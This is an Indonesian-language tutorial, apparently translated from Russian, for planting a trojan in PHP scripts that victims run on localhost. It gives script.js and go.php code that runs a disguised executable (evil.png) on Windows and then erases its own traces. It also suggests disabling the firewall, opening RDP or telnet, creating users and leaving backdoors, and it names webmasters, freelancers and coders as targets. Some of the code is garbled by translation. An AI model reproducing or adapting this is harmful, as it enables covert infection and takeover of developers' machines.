Untuk memengaruhi seseorang yang menggunakan php, kita membutuhkan donor skrip, trojan, dan 2 file. Korban kita harus menjalankan skrip di localhost (Denwer, AMPPS, AppServ, EasyPHP, Nimp, Xampp, dll.). Pastikan untuk menunjukkan bahwa Anda perlu menguji perangkat lunak pada komputer lokal atau membuat Trojan menjadi skrip yang seharusnya dijalankan hanya di localhost.
File yang di butuhkan
1. script.js
2. go.php
3. evil.png (trojan dengan ekstensi yang sudah dimodifikasi)
4. Text Editor/ Donor
Copy Source Code script.js Berikut
- // for the ajax
- function to work getXmlHttp () {
- var xmlhttp;
- try {
- xmlhttp = new ActiveXObject ("Msxml2.XMLHTTP");}
- catch (e) {
- try {
- xmlhttp = new ActiveXObject ("Microsoft.XMLHTTP");}
- catch (E) {
xmlhttp = false; }}
- if (! xmlhttp && typeof XMLHttpRequest! = 'undefined') {
- xmlhttp = new XMLHttpRequest ();
- }
- return xmlhttp; }
- // Run the script go.php
- // ### start456789
- var x = getXmlHttp (); x.open ('GET', '/go.php', true);
- x.onreadystatechange = function () {
- if (x.readyState == 4) {if (x.status == 200) {}}};
- x.send (null);
- // ### end456789
- // Any further code
Anda dapat memasukkan source code di atas ke dalam skrip js apa pun yang digunakan oleh aplikasi yang sedang kita trojaning. Dalam kode ini, ajax-request dikirim ke beberapa skrip bernama go.php. Sekarang mari kita lihat apa yang ada di skrip go.php:
Copy Source Code go.php Berikut
- <? php
- // prepare the trojan
- rename ("evil.png", "evil.exe");
- // remove this script
- unlink ('go.php');
- // Clean the tracks in script.js
- $ source = file_get_contents ('script.js');
- preg_replace ("// ### start456789 [\ s | \ S] * // ### end456789", "", $ source);
- $ fh = fopen ('script.js', 'w');
- fwrite ($ fh, $ source);
- fclose ($ fh);
- // We work only on win
- $ pos = strpos (php_uname (), "Win");
- if ($ pos! == False) {
- exec ('evil.exe'); }
- // delete the Trojan if it does not go away or we are not on vid
- unlink ('evil.exe');
Jika Anda 100% yakin bahwa korban memakai Win7, Vista, XP, maka tidak perlu untuk mengubah nama menjadi .exe
- <? php
- // remove this script
- unlink ('go.php');
- // Clean the tracks in script.js
- $ source = file_get_contents ('script.js');
- preg_replace ("// ### start456789 [\ s | \ S] * // ### end456789", "", $ source);
- $ fh = fopen ('script.js', 'w');
- fwrite ($ fh, $ source);
- fclose ($ fh);
- // We work only on win
- $ pos = strpos (php_uname (), "Win");
- if ($ pos! == False) {
- exec ('evil.png');
- }
- // delete the Trojan if it does not go away or we are not on the
- unlink ('evil.png');
Saya pikir konsep itu bisa dimengerti. Hasilnya (alih-alih menjalankan trojan adalah exec ('calc.exe')): Apa yang bisa saya lakukan / tambahkan?
Script trojan dari beberapa file Menjalankan trojan dari arsip yang dilindungi kata sandi Memeriksa akses Internet Memeriksa peluncuran di mesin virtual Menggunakan baris perintah sepenuhnya (lepaskan firewall, buka telnet, rdp, seseorang, buat pengguna baru, dll.) Jika fungsi exec dilarang, coba gunakan yang lain (sistem, passthru, proc_open, shell_exec, popen ...) Tambahkan beberapa tindakan jika skrip berjalan di bawah linux, macOS. Tentu saja, untuk lebih banyak bespalevnosti, Anda dapat mengubah nama file, menyembunyikannya dalam subfolder, dll. Sesuai keinginan, dimungkinkan untuk mendorong semua dalam satu file (trojan, js, php), dimungkinkan untuk dilakukan tanpa trojan - untuk membuat pengguna, untuk membuka akses pada RDP, untuk mengirim IP gateway
Siapa yang bisa menjadi target?
Webmaster (mudah diintegrasikan ke dorgen, spamilk, parser, chekalku, skrip yang dibatalkan, tombol lain "menjarah") Web-studio, freelancer, coders (dengan dalih memodifikasi "situs", skrip) School-Hecks (pribadi pengelola shell, generator palsu lokal, forum pembuangan, dll.) Penontonnya agak sempit, tetapi sangat menarik. Dan tentu saja, tidak ada yang melarang meninggalkan php-backdoor dan berdebar, kalau-kalau skrip dijalankan di Internet, tapi itu cerita lain